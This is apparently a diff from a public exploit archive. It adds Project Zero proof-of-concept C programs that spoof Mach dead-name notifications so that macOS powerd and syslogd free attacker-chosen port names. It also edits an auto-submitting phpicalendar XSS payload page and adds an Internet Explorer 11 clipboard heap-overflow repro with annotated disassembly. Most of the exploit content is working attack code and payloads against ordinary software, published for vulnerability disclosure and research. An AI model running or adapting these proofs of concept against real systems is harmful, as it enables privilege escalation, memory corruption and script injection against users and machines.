+You could use this bug to replace a mach port name in powerd (eg the bootstrap port, an IOService port etc) with a one for which the attacker holds the receieve right.
+
+Since there's still no KDK for 10.12.1 you can test this by attaching to powerd in userspace and setting a breakpoint in pm_mig_demux at the
+mach_port_deallocate call and you'll see the controlled value in rsi.
+
+Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#include <servers/bootstrap.h>
+#include <mach/mach.h>
+#include <mach/ndr.h>
+
+char* service_name = "com.apple.PowerManagement.control";
+
+struct notification_msg {
+    mach_msg_header_t   not_header;
+    NDR_record_t        NDR;
+    mach_port_name_t not_port;
+};
+
+mach_port_t lookup(char* name) {
+  mach_port_t service_port = MACH_PORT_NULL;
+  kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port);
+  if(err != KERN_SUCCESS){
+    printf("unable to look up %s\n", name);
+    return MACH_PORT_NULL;
+  }
+  
+  return service_port;
+}
+
+int main() {
+  kern_return_t err;
+
+  mach_port_t service_port = lookup(service_name);
+
+  mach_port_name_t target_port = 0x1234; // the name of the port in the target namespace to destroy
+
+  printf("%d\n", getpid());
+  printf("service port: %x\n", service_port);
+
+	struct notification_msg not = {0};
+
+  not.not_header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
+  not.not_header.msgh_size = sizeof(struct notification_msg);
+  not.not_header.msgh_remote_port = service_port;
+  not.not_header.msgh_local_port = MACH_PORT_NULL;
+  not.not_header.msgh_id = 0110; // MACH_NOTIFY_DEAD_NAME
+
+	not.NDR = NDR_record;
+
+	not.not_port = target_port;
+
+  // send the fake notification message
+  err = mach_msg(&not.not_header,
+                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                 (mach_msg_size_t)sizeof(struct notification_msg),
+                 0,
+                 MACH_PORT_NULL,
+                 MACH_MSG_TIMEOUT_NONE,
+                 MACH_PORT_NULL); 
+  printf("fake notification message: %s\n", mach_error_string(err));
+  
+  return 0;
+}
\ No newline at end of file
diff --git a/platforms/multiple/dos/40959.c b/platforms/multiple/dos/40959.c
new file mode 100755
index 000000000..e83959a75
--- /dev/null
+++ b/platforms/multiple/dos/40959.c
@@ -0,0 +1,123 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=977
+
+syslogd (running as root) hosts the com.apple.system.logger mach service. It's part of the system.sb
+sandbox profile and so reachable from a lot of sandboxed contexts.
+
+Here's a snippet from its mach message handling loop listening on the service port:
+
+    ks = mach_msg(&(request->head), rbits, 0, rqs, global.listen_set, 0, MACH_PORT_NULL);
+  ...
+    if (request->head.msgh_id == MACH_NOTIFY_DEAD_NAME)
+    {
+      deadname = (mach_dead_name_notification_t *)request;
+      dispatch_async(asl_server_queue, ^{
+        cancel_session(deadname->not_port);
+        /* dead name notification includes a dead name right */
+        mach_port_deallocate(mach_task_self(), deadname->not_port);
+        free(request);
+      });
+
+An attacker with a send-right to the service can spoof a MACH_NOTIFY_DEAD_NAME message and cause an
+arbitrary port name to be passed to mach_port_deallocate as deadname->not_port doesn't name a port right
+but is a mach_port_name_t which is just a controlled integer.
+
+An attacker could cause syslogd to free a privilged port name and get it reused to name a port for which
+the attacker holds a receive right.
+
+Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
+*/
+
+// ianbeer
+
+#if 0
+MacOS/iOS arbitrary port replacement in syslogd
+
+syslogd (running as root) hosts the com.apple.system.logger mach service. It's part of the system.sb
+sandbox profile and so reachable from a lot of sandboxed contexts.
+
+Here's a snippet from its mach message handling loop listening on the service port:
+
+		ks = mach_msg(&(request->head), rbits, 0, rqs, global.listen_set, 0, MACH_PORT_NULL);
+	...
+		if (request->head.msgh_id == MACH_NOTIFY_DEAD_NAME)
+		{
+			deadname = (mach_dead_name_notification_t *)request;
+			dispatch_async(asl_server_queue, ^{
+				cancel_session(deadname->not_port);
+				/* dead name notification includes a dead name right */
+				mach_port_deallocate(mach_task_self(), deadname->not_port);
+				free(request);
+			});
+
+An attacker with a send-right to the service can spoof a MACH_NOTIFY_DEAD_NAME message and cause an
+arbitrary port name to be passed to mach_port_deallocate as deadname->not_port doesn't name a port right
+but is a mach_port_name_t which is just a controlled integer.
+
+An attacker could cause syslogd to free a privilged port name and get it reused to name a port for which
+the attacker holds a receive right.
+
+Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#include <servers/bootstrap.h>
+#include <mach/mach.h>
+#include <mach/ndr.h>
+
+char* service_name = "com.apple.system.logger";
+
+struct notification_msg {
+    mach_msg_header_t   not_header;
+    NDR_record_t        NDR;
+    mach_port_name_t not_port;
+};
+
+mach_port_t lookup(char* name) {
+  mach_port_t service_port = MACH_PORT_NULL;
+  kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port);
+  if(err != KERN_SUCCESS){
+    printf("unable to look up %s\n", name);
+    return MACH_PORT_NULL;
+  }
+  
+  return service_port;
+}
+
+int main() {
+  kern_return_t err;
+
+  mach_port_t service_port = lookup(service_name);
+
+  mach_port_name_t target_port = 0x1234; // the name of the port in the target namespace to destroy
+
+  printf("%d\n", getpid());
+  printf("service port: %x\n", service_port);
+
+	struct notification_msg not = {0};
+
+  not.not_header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
+  not.not_header.msgh_size = sizeof(struct notification_msg);
+  not.not_header.msgh_remote_port = service_port;
+  not.not_header.msgh_local_port = MACH_PORT_NULL;
+  not.not_header.msgh_id = 0110; // MACH_NOTIFY_DEAD_NAME
+
+	not.NDR = NDR_record;
+
+	not.not_port = target_port;
+
+  // send the fake notification message
+  err = mach_msg(&not.not_header,
+                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                 (mach_msg_size_t)sizeof(struct notification_msg),
+                 0,
+                 MACH_PORT_NULL,
+                 MACH_MSG_TIMEOUT_NONE,
+                 MACH_PORT_NULL); 
+  printf("fake notification message: %s\n", mach_error_string(err));
+  
+  return 0;
+}
diff --git a/platforms/php/webapps/29370.txt b/platforms/php/webapps/29370.txt
index 83e71e3c7..7250ffbdb 100755
--- a/platforms/php/webapps/29370.txt
+++ b/platforms/php/webapps/29370.txt
@@ -6,6 +6,6 @@ An attacker may leverage these issues to have arbitrary script code execute in t
        
 http://www.example.com/phpicalendar/preferences.php?cal=Home,US+Holidays,Work &getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E <html> <head></head> <body> <title>PHP icalendar XSS in preferences.php PoC</title> <p><a href="http://phpicalendar.net/" target="_BLANK">PHP icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p> <p>Modify the target host , by default http://localhost/</P> <br /><br /><form method=&#039;post&#039; action=&#039;
 
-http://localhost/phpicalendar/preferences.php?action=setcookie&#039;> cookie_language: <input input=&#039;text&#039; value=&#039;Spanish&#039; name=&#039;cookie_language&#039; style=&#039;width: 80%&#039; /><br> cookie_calendar: <input input=&#039;text&#039; value=&#039;all_calendars_combined971&#039; name=&#039;cookie_calendar&#039; style=&#039;width: 80%&#039; /><br> cpath: <input input=&#039;text&#039; value=&#039;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&#039; name=&#039;cpath&#039; style=&#039;width: 80%&#039; /><br> cookie_view: <input input=&#039;text&#039; value=&#039;day&#039; name=&#039;cookie_view&#039; style=&#039;width: 80%&#039; /><br> cookie_time: <input input=&#039;text&#039; value=&#039;0700&#039; name=&#039;cookie_time&#039; style=&#039;width: 80%&#039; /><br> cookie_startday: <input input=&#039;text&#039; value=&#039;Sunday&#039; name=&#039;cookie_startday&#039; style=&#039;width: 80%&#039; /><br> cookie_style: <input input=&#039;text&#039; value=&#039;default&#039; name=&#039;cookie_style&#039; style=&#039;width: 80%&#039; /><br> unset: <input input=&#039;text&#039; value=&#039;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&#039; name=&#039;unset&#039; style=&#039;width: 80%&#039; /><br> set: <input input=&#039;text&#039; value=&#039;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&#039; name=&#039;set&#039; style=&#039;width: 80%&#039; /><br> <input type=&#039;submit&#039; value=&#039;submit&#039; /><br> </form><hr /> <textarea style=&#039;width: 80%; height: 50%;&#039;> <form method=&#039;post&#039; action=&#039;
+http://localhost/phpicalendar/preferences.php?action=setcookie&#039;> cookie_language: <input input=&#039;text&#039; value=&#039;Spanish&#039; name=&#039;cookie_language&#039; style=&#039;width: 80%&#039; /><br> cookie_calendar: <input input=&#039;text&#039; value=&#039;all_calendars_combined971&#039; name=&#039;cookie_calendar&#039; style=&#039;width: 80%&#039; /><br> cpath: <input input=&#039;text&#039; value=&#039;<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&#039; name=&#039;cpath&#039; style=&#039;width: 80%&#039; /><br> cookie_view: <input input=&#039;text&#039; value=&#039;day&#039; name=&#039;cookie_view&#039; style=&#039;width: 80%&#039; /><br> cookie_time: <input input=&#039;text&#039; value=&#039;0700&#039; name=&#039;cookie_time&#039; style=&#039;width: 80%&#039; /><br> cookie_startday: <input input=&#039;text&#039; value=&#039;Sunday&#039; name=&#039;cookie_startday&#039; style=&#039;width: 80%&#039; /><br> cookie_style: <input input=&#039;text&#039; value=&#039;default&#039; name=&#039;cookie_style&#039; style=&#039;width: 80%&#039; /><br> unset: <input input=&#039;text&#039; value=&#039;<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&#039; name=&#039;unset&#039; style=&#039;width: 80%&#039; /><br> set: <input input=&#039;text&#039; value=&#039;<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&#039; name=&#039;set&#039; style=&#039;width: 80%&#039; /><br> <input type=&#039;submit&#039; value=&#039;submit&#039; /><br> </form><hr /> <textarea style=&#039;width: 80%; height: 50%;&#039;> <form method=&#039;post&#039; action=&#039;
 
-http://localhost/phpicalendar/preferences.php?action=setcookie&#039;> cookie_language: <input input=&#039;text&#039; value=&#039;Spanish&#039; name=&#039;cookie_language&#039; style=&#039;width: 80%&#039; /><br> cookie_calendar: <input input=&#039;text&#039; value=&#039;all_calendars_combined971&#039; name=&#039;cookie_calendar&#039; style=&#039;width: 80%&#039; /><br> cpath: <input input=&#039;text&#039; value=&#039;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&#039; name=&#039;cpath&#039; style=&#039;width: 80%&#039; /><br> cookie_view: <input input=&#039;text&#039; value=&#039;day&#039; name=&#039;cookie_view&#039; style=&#039;width: 80%&#039; /><br> cookie_time: <input input=&#039;text&#039; value=&#039;0700&#039; name=&#039;cookie_time&#039; style=&#039;width: 80%&#039; /><br> cookie_startday: <input input=&#039;text&#039; value=&#039;Sunday&#039; name=&#039;cookie_startday&#039; style=&#039;width: 80%&#039; /><br> cookie_style: <input input=&#039;text&#039; value=&#039;default&#039; name=&#039;cookie_style&#039; style=&#039;width: 80%&#039; /><br> unset: <input input=&#039;text&#039; value=&#039;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&#039; name=&#039;unset&#039; style=&#039;width: 80%&#039; /><br> set: <input input=&#039;text&#039; value=&#039;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&#039; name=&#039;set&#039; style=&#039;width: 80%&#039; /><br> <input type=&#039;submit&#039; value=&#039;submit&#039; /><br> </form> &lt;script&gt; document.forms[0].submit() &lt;/script&gt; &lt;/textarea&gt; </body> </html>
\ No newline at end of file
+http://localhost/phpicalendar/preferences.php?action=setcookie&#039;> cookie_language: <input input=&#039;text&#039; value=&#039;Spanish&#039; name=&#039;cookie_language&#039; style=&#039;width: 80%&#039; /><br> cookie_calendar: <input input=&#039;text&#039; value=&#039;all_calendars_combined971&#039; name=&#039;cookie_calendar&#039; style=&#039;width: 80%&#039; /><br> cpath: <input input=&#039;text&#039; value=&#039;<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&#039; name=&#039;cpath&#039; style=&#039;width: 80%&#039; /><br> cookie_view: <input input=&#039;text&#039; value=&#039;day&#039; name=&#039;cookie_view&#039; style=&#039;width: 80%&#039; /><br> cookie_time: <input input=&#039;text&#039; value=&#039;0700&#039; name=&#039;cookie_time&#039; style=&#039;width: 80%&#039; /><br> cookie_startday: <input input=&#039;text&#039; value=&#039;Sunday&#039; name=&#039;cookie_startday&#039; style=&#039;width: 80%&#039; /><br> cookie_style: <input input=&#039;text&#039; value=&#039;default&#039; name=&#039;cookie_style&#039; style=&#039;width: 80%&#039; /><br> unset: <input input=&#039;text&#039; value=&#039;<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&#039; name=&#039;unset&#039; style=&#039;width: 80%&#039; /><br> set: <input input=&#039;text&#039; value=&#039;<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&#039; name=&#039;set&#039; style=&#039;width: 80%&#039; /><br> <input type=&#039;submit&#039; value=&#039;submit&#039; /><br> </form> <script> document.forms[0].submit() </script> </textarea> </body> </html>
\ No newline at end of file
diff --git a/platforms/windows/dos/40960.svg b/platforms/windows/dos/40960.svg
new file mode 100755
index 000000000..46e60b53b
--- /dev/null
+++ b/platforms/windows/dos/40960.svg
@@ -0,0 +1,786 @@
+<!--
+Source: http://blog.skylined.nl/20161221001.html
+
+Synopsis
+
+A specially crafted web-page can trigger an out-of-bounds write in Microsoft Internet Explorer 11. Code that handles pasting images from the clipboard uses an incorrect buffer length, which allows writing beyond the boundaries of a heap-based buffer. An attacker able to trigger this vulnerability can execute arbitrary code.
+
+Known affected software, attack vectors and potential mitigations
+
+Microsoft Internet Explorer 11.0.9600.16521
+
+An attacker would need to get a target user to open a specially crafted web-page. In order to trigger the issue, the web-page needs to either programmatically copy/paste an image using Javascript or get the user to do this (for instance by tricking the user into typing keyboard shortcuts such as CTRL+C/CTRL+V) . By default, MSIE prompts the user to allow or disallow programmatically copy/pasting the first time a website tries to do this, so user-interaction is normally required in such cases. Disabling the Allow Programmatic clipboard access setting in Internet Options -> Security Settings -> [Choose a zone] -> Scripting should prevent websites from programmatically copy/pasting an image. Disabling execution of scripts on web-pages altogether will have the same effect. Please note that neither option prevents a website from social engineering the user into typing a keyboard shortcut to copy/paste the image.
+
+Details
+
+When an image is pasted in MSHTML, it gets converted from BMP format to PNG. This is done in the MSHTML!CPaste­Command::Convert­Bitmapto­Png function. This function incorrectly uses the size of the original BMP image to allocate memory for storing the converted PNG image. The PNG image will be smaller than the BMP under most circumstances, but if a specially crafted image leads to the original BMP image being smaller than the converted PNG, the function will write PNG data beyond the bounds of the allocated memory.
+
+Here is some pseudo code that was created by reverse engineering the CPaste­Command::Convert­Bitmapto­Png function, which shows the vulnerability:
+
+Convert­Bitmapto­Png(
+  [IN] VOID* po­Bitmap,  UINT u­Bitmap­Size,
+  [OUT] VOID** ppo­Png­Image, UINT* pu­Png­Image­Size
+) {
+  // Convert a BMP formatted image to a PNG formatted image.
+  CMem­Stm* po­CMem­Stm;
+  IWICStream* po­Wic­Bitmap;
+  STATSTG o­Stat­Stg;
+  TSmart­Array<unsigned char> po­Png­Image;
+  UINT u­Read­Size;
+  // Create a CMem­Stm for the PNG image.
+  Create­Stream­On­HGlobal(NULL, True, po­CMem­Stm);
+  // Create an IWICStream from the BMP image.
+  Initialize­From­Memory(po­Bit­Map, u­Bitmap­Size,
+      &GUID_­Container­Format­Bmp, &po­Wic­Bitmap)));
+  // Write BMP image in IWICStream to PNG image in CMem­Stm
+  Write­Wic­Bitmap­To­Stream(po­Wic­Bitmap, &GUID_­Container­Format­Png, po­CMem­Stm);
+  // Get size of PNG image in CMem­Stm and save it to the output variable.
+  o­CMem­Stm->Stat(&o­Stat­Stg, 0);
+  *pu­Png­Image­Size = o­Stat­Stg.cb­Size.Low­Part;
+  // Allocate memory for the PNG
+  po­Png­Image->New(u­Bitmap­Size);
+  // Go to start of PNG image in CMem­Stm
+  po­CMem­Stm->Seek(0, STREAM_­SEEK_­SET, NULL, &p­Position­Low);
+  // Read PNG image in CMem­Stm to allocated memory.
+  po­CMem­Stm->Read(po­Png­Image, *pu­Png­Image­Size, &u­Read­Size);
+  // Save location of allocated memory with PNG image to output variable.
+  *ppo­Png­Image = po­Png­Image;
+}
+
+Notes:
+
+The code uses the wrong size to allocate memory in po­Png­Image->New(u­Bitmap­Size);. Changing this line of code to po­Png­Image->New(*pu­Png­Image­Size); should address the issue.
+The PNG image is written to the allocated memory in po­CMem­Stm->Read(po­Png­Image, *pu­Png­Image­Size, &u­Read­Size);. This is where the code can potentially write beyond the boundaries of the allocated memory if u­Bitmap­Size is smaller than *pu­Png­Image­Size.
+
+Repro.svg:
+-->
+
+<svg style="width:1px; height: 1px;" xmlns="http://www.w3.org/2000/svg">
+  <script>
+    window.onload = function () {
+      document.design­Mode="on";
+      document.exec­Command("Select­All");/*exec*/
+      window.get­Selection().collapse­To­End();/*js_­om*/
+      document.exec­Command("Copy");/*exec*/
+      document.exec­Command("Paste", false);/*exec*/
+    }
+  </script>
+</svg>
+
+<!--
+Below are my notes from reversing the code for your viewing pleasure. There are a few flaws/omissions in the parts that are not directly relevant to the bug, as I did not attempt to finish all the details after I figured out enough to determine root cause, exploitability and attack vectors.
+
+MSHTML!CPaste­Command..Convert­Bitmapto­Png.txt
+MSHTML!CPaste­Command::Convert­Bitmapto­Png(                                                                                                                       
+    VOID* po­Bitmap<ebp+8>,                                                                                                                                      
+    UINT u­Bitmap­Size<ebp+c>,                                                                                                                                    
+    BYTE[]** ppo­Png­Image<ebp+10>,                                                                                                                               
+    UINT* pu­Png­Image­Size<ebp+14>):                                                                                                                            
+-50 STATSTG o­Stat­Stg {                                                                                                                                          
+  -50 00 04 LPOLESTR       pwcs­Name;                                                                                                                            
+  -4C 04 04 DWORD          type;                                                                                                                                
+  -48 08 08 ULARGE_­INTEGER cb­Size;                                                                                                                              
+  -40 10 08 FILETIME       mtime;                                                                                                                               
+  -38 18 08 FILETIME       ctime;                                                                                                                               
+  -30 20 08 FILETIME       atime;                                                                                                                               
+  -28 28 04 DWORD          grf­Mode;                                                                                                                             
+  -24 2C 04 DWORD          grf­Locks­Supported;                                                                                                                   
+  -20 30 10 CLSID          clsid;                                                                                                                               
+  -10 34 04 DWORD          grf­State­Bits;                                                                                                                        
+  -0C 38 04 DWORD          reserved;                                                                                                                            
+} size = 3C                                                                                                                                                     
+-54 CMem­Stm* po­CMem­Stm                                                                                                                                          
+-58 VOID* po­Wic­Bitmap                                                                                                                                           
+-5C UCHAR[]* po­Png­Image (TSmart­Array)                                                                                                                                        
+-60 UINT u­Read­Size                                                                                                                                              
+-64 BYTE[]** ppo­Png­Image                                                                                                                                        
+-70 DWORD p­Position­Low // lower DWORD of 64 bit position in stream.                                                                                             
+                                                                                                                                                                
+6f3818fd 8bff            mov     edi,edi                                                                                                                        
+6f3818ff 55              push    ebp                                                                                                                            
+6f381900 8bec            mov     ebp,esp                                                                                                                        
+6f381902 83ec74          sub     esp,74h                                                                                                                        
+6f381905 a13c03436f      mov     eax,dword ptr [MSHTML!__security_­cookie (6f43033c)]                                                                            
+6f38190a 33c5            xor     eax,ebp                                                                                                                        
+6f38190c 8945fc          mov     dword ptr [ebp-4],eax                                                                                                          
+6f38190f 8b4510          mov     eax,dword ptr [ebp+10h]                        ppo­Png­Image<eax> = ppo­Png­Image<stack>                                           
+6f381912 8d4dac          lea     ecx,[ebp-54h]                                  &po­CMem­Stm<ecx> = &po­CMem­Stm<stack>                                             
+6f381915 53              push    ebx                                            //save reg                                                                      
+6f381916 8b5d14          mov     ebx,dword ptr [ebp+14h]                        pu­Png­Image­Size<ebx> = pu­Png­Image­Size<stack>                                     
+6f381919 56              push    esi                                            //save reg                                                                      
+6f38191a 8b7508          mov     esi,dword ptr [ebp+8]                          po­Bitmap<esi> = po­Bitmap<ebp+8>                                                 
+6f38191d 57              push    edi                                            //save reg                                                                      
+6f38191e 33ff            xor     edi,edi                                        <edi> = 0                                                                       
+6f381920 89459c          mov     dword ptr [ebp-64h],eax                        ppo­Png­Image<stack> = ppo­Png­Image<eax>                                           
+6f381923 897da8          mov     dword ptr [ebp-58h],edi                        po­Wic­Bitmap<stack> = 0<edi>                                                     po­Wic­Bitmap = 0
+6f381926 897dac          mov     dword ptr [ebp-54h],edi                        po­CMem­Stm<stack> = 0<edi>                                                       po­CMem­Stm = 0
+6f381929 e8566827ff      call    6e5f8184                                       p­Smart­Stream­Pointer<eax> = MSHTML!TSmart­Pointer<                                p­Smart­Stream­Pointer = &(TSmart­Pointer<...>(&po­CMem­Stm))
+                                                                                  Windows::Foundation::IAsync­Operation<                                         
+                                                                                    Windows::Storage::Streams::IRandom­Access­Stream *                            
+                                                                                  >                                                                             
+                                                                                >::operator&(                                                                   
+                                                                                    &po­CMem­Stm)                                                                 
+6f38192e 50              push    eax                                            larg3<stack> = p­Smart­Stream­Pointer<eax>                                         
+6f38192f 6a01            push    1                                              larg2<stack> = 1                                                                
+6f381931 57              push    edi                                            larg1<stack> = 0<edi>                                                           
+6f381932 ff1520c0426f    call    dword ptr [6f42c020]                           HRESULT h­Result<eax> = combase!Create­Stream­On­HGlobal(                           if (FAILED(h­Result = combase!Create­Stream­On­HGlobal(NULL, True, p­Smart­Stream­Pointer)))
+                                                                                    h­Global = NULL,                                                             
+                                                                                    f­Delete­On­Release = True,                                                    
+                                                                                    ppstm = p­Smart­Stream­Pointer<eax>);                                          
+6f381938 8bf8            mov     edi,eax                                        h­Result<edi> = h­Result<eax>                                                     
+6f38193a 85ff            test    edi,edi                                        if (h­Result<edi> < 0)                                                           
+6f38193c 0f88b8000000    js      6f3819fa                                           goto exit_­label_1                                                               goto exit_­label_1;
+6f381942 8b550c          mov     edx,dword ptr [ebp+0Ch]                        larg1<edx> = u­Bitmap­Size<stack>                                                 
+6f381945 8d45a8          lea     eax,[ebp-58h]                                  &po­Wic­Bitmap<eax> = &(po­Wic­Bitmap<stack>)                                       
+6f381948 50              push    eax                                            larg3<stack> = &po­Wic­Bitmap<eax>                                                
+6f381949 6860147a6e      push    6e7a1460                                       larg2<stack> = &GUID_­Container­Format­Bmp                                         
+6f38194e 8bce            mov     ecx,esi                                        larg1<ecx> = po­Bitmap<esi>                                                  
+6f381950 e8c8325dff      call    6e954c1d                                       h­Result<eax> = MSHTML!Initialize­From­Memory(                                     if (FAILED(h­Result = Initialize­From­Memory(po­Bit­Map, u­Bitmap­Size, &GUID_­Container­Format­Bmp, &po­Wic­Bitmap)))
+                                                                                    po­Bitmap,                                                                   
+                                                                                    u­Bitmap­Size,                                                                
+                                                                                    &GUID_­Container­Format­Bmp<dll>,                                              
+                                                                                    &po­Wic­Bitmap);                                                              
+6f381955 8bf8            mov     edi,eax                                        h­Result<edi> = h­Result<eax>                                                     
+6f381957 85ff            test    edi,edi                                        if (h­Result < 0)                                                                
+6f381959 0f889b000000    js      6f3819fa                                           goto exit_­label_1                                                               goto exit_­label_1;
+6f38195f ff75ac          push    dword ptr [ebp-54h]                            larg3<stack> = po­CMem­Stm<stack>                                                 
+6f381962 8b4da8          mov     ecx,dword ptr [ebp-58h]                        larg1<ecx> = po­Wic­Bitmap<stack>                                             
+6f381965 ba24a4736e      mov     edx,6e73a424                                   larg2<edx> = &GUID_­Container­Format­Png<dll>                                      
+6f38196a e8e4f6e6ff      call    6f1f1053                                       h­Result<eax> = MSHTML!Write­Wic­Bitmap­To­Stream(                                   if (FAILED(h­Result = Write­Wic­Bitmap­To­Stream(po­Wic­Bitmap, &GUID_­Container­Format­Png, po­CMem­Stm)))
+                                                                                    po­Wic­Bitmap,                                                                
+                                                                                    &GUID_­Container­Format­Png,                                                   
+                                                                                    po­CMem­Stm)                                                                  
+6f38196f 8bf8            mov     edi,eax                                        h­Result<edi> = h­Result<eax>                                                     
+6f381971 85ff            test    edi,edi                                        if (h­Result<edi> < 0)                                                           
+6f381973 0f8881000000    js      6f3819fa                                           goto exit_­label_1                                                               goto exit_­label_1;
+6f381979 8b45ac          mov     eax,dword ptr [ebp-54h]                        po­CMem­Stm<eax> = po­CMem­Stm<stack>                                               
+6f38197c 8d55b0          lea     edx,[ebp-50h]                                  &o­Stat­Stg<edx> = &(o­Stat­Stg<stack>)                                             
+6f38197f 33f6            xor     esi,esi                                        0<esi> = 0                                                                      
+6f381981 56              push    esi                                            larg3<stack> = 0<esi>                                                           
+6f381982 52              push    edx                                            larg2<stack> = &o­Stat­Stg<edx>                                                   
+6f381983 8b08            mov     ecx,dword ptr [eax]                            af­VFTable<ecx> = po­CMem­Stm<eax>->af­VFTable                                      
+6f381985 50              push    eax                                            larg1<stack> = po­CMem­Stm<eax>                                               
+6f381986 ff5130          call    dword ptr [ecx+30h]                            h­Result<eax> = po­CMem­Stm->Stat(&o­Stat­Stg, 0)                                    if (FAILED(h­Result = po­CMem­Stm->Stat(&o­Stat­Stg, 0)))
+6f381989 8bf8            mov     edi,eax                                        h­Result<edi> = h­Result<eax>                                                     
+6f38198b 85ff            test    edi,edi                                        if (h­Result<edi> < 0)                                                           
+6f38198d 786b            js      6f3819fa                                           goto exit_­label_1                                                               goto exit_­label_1;
+6f38198f 8b45b8          mov     eax,dword ptr [ebp-48h]                        u­Png­Image­Size<eax> = o­Stat­Stg<stack>.cb­Size.Low­Part                             
+6f381992 8d4da4          lea     ecx,[ebp-5Ch]                                  &po­Png­Image<ecx> = &(po­Png­Image<stack>)                                         
+6f381995 ff750c          push    dword ptr [ebp+0Ch]                            u­Bitmap­Size<stack> = u­Bitmap­Size<stack>                                         
+6f381998 8903            mov     dword ptr [ebx],eax                            *pu­Png­Image­Size<ebx> = u­Png­Image­Size<eax>                                       *pu­Png­Image­Size = o­Stat­Stg.cb­Size.Low­Part
+6f38199a 8975a4          mov     dword ptr [ebp-5Ch],esi                        po­Png­Image<stack> = 0<esi>                                                      ppo­Png­Image = NULL
+6f38199d e8c34453ff      call    6e8b5e65                                       MSHTML!TSmart­Array<unsigned char>::New(                                         if (FAILED(h­Result = po­Png­Image->New(u­Bitmap­Size)))
+                                                                                    u­Bitmap­Size<stack>)                                                         
+6f3819a2 8bf8            mov     edi,eax                                        h­Result<edi> = h­Result<eax>                                                     
+6f3819a4 85ff            test    edi,edi                                        if (h­Result<edi> >= 0)                                                          
+6f3819a6 7905            jns     6f3819ad                                           goto skip_1                                                                 
+                                                                                free_­and_­exit_­label_2:                                                          
+6f3819a8 8b4da4          mov     ecx,dword ptr [ebp-5Ch]                        po­Png­Image<ecx> = po­Png­Image<stack>                                             goto free_­po­Png­Image_­and_­exit
+6f3819ab eb48            jmp     6f3819f5                                       goto free_­and_­exit_­label_1                                                      
+                                                                                skip_1:                                                                         
+6f3819ad 8b45ac          mov     eax,dword ptr [ebp-54h]                        po­CMem­Stm<eax> = po­CMem­Stm<stack>                                               
+6f3819b0 8d5590          lea     edx,[ebp-70h]                                  &p­Position­Low<edx> = &(p­Position­Low<stack>)                                     
+6f3819b3 52              push    edx                                            larg3.2 = &p­Position­Low<edx>                                                    
+6f3819b4 56              push    esi                                            larg3.1 = 0<esi>                                                                
+6f3819b5 56              push    esi                                            larg2.2 = 0<esi>                                                                
+6f3819b6 8b08            mov     ecx,dword ptr [eax]                            af­VFTable<ecx> = po­CMem­Stm<eax>->af­VFTable                                      
+6f3819b8 56              push    esi                                            larg2.1 = 0<esi>                                                                
+6f3819b9 50              push    eax                                            larg1 = po­CMem­Stm<eax>                                                      
+6f3819ba ff5114          call    dword ptr [ecx+14h]                            h­Result<eax> = po­CMem­Stm->Seek(                                                 if (FAILED(h­Result = po­CMem­Stm->Seek(0, STREAM_­SEEK_­SET, NULL, &p­Position­Low)))
+                                                                                    0,                                                                          
+                                                                                    STREAM_­SEEK_­SET,                                                            
+                                                                                    NULL,                                                                       
+                                                                                    &p­Position­Low)                                                              
+6f3819bd 8bf8            mov     edi,eax                                        h­Result<edi> = h­Result<eax>                                                     
+6f3819bf 85ff            test    edi,edi                                        if (h­Result<edi> < 0)                                                           
+6f3819c1 78e5            js      6f3819a8                                           goto free_­and_­exit_­label_2                                                      goto free_­po­Png­Image_­and_­exit
+6f3819c3 8b45ac          mov     eax,dword ptr [ebp-54h]                        po­CMem­Stm<eax> = po­CMem­Stm<stack>                                               
+6f3819c6 8d55a0          lea     edx,[ebp-60h]                                  &u­Read­Size<edx> = &(u­Read­Size<stack>)                                           
+6f3819c9 8b75a4          mov     esi,dword ptr [ebp-5Ch]                        po­Png­Image<esi> = po­Png­Image<stack>                                             
+6f3819cc 52              push    edx                                            larg4 = &u­Read­Size<edx>                                                         
+6f3819cd ff33            push    dword ptr [ebx]                                larg3 = *pu­Png­Image­Size<ebx>                                                    
+6f3819cf 8b08            mov     ecx,dword ptr [eax]                            af­VFTable<ecx> = po­CMem­Stm<eax>->af­VFTable                                      
+6f3819d1 56              push    esi                                            larg2 = po­Png­Image<esi>                                                         
+6f3819d2 50              push    eax                                            larg1 = <eax>                                                               
+6f3819d3 ff510c          call    dword ptr [ecx+0Ch]                            h­Result = po­CMem­Stm->Read(                                                      if (FAILED(po­CMem­Stm->Read(po­Png­Image, *pu­Png­Image­Size, &u­Read­Size)))
+                                                                                    po­Png­Image,                                                                 
+       **************                                                               *pu­Png­Image­Size,                                                            
+                                                                                    &u­Read­Size)                                                                 
+6f3819d6 8bf8            mov     edi,eax                                        h­Result<edi> = h­Result<eax>                                                     
